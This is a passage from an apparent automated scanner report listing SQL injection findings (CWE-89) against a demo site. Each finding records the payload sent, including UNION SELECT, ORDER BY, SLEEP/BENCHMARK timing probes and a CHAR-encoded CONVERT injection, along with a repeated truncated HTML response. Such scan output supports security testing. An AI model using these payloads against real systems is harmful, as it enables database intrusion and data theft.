src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1492\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1493\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1494\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1495\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1496\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %' AND 8310=8310 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1497\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1498\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1499\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1\n=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1500\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1501\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1502\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1503\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1504\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1505\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget 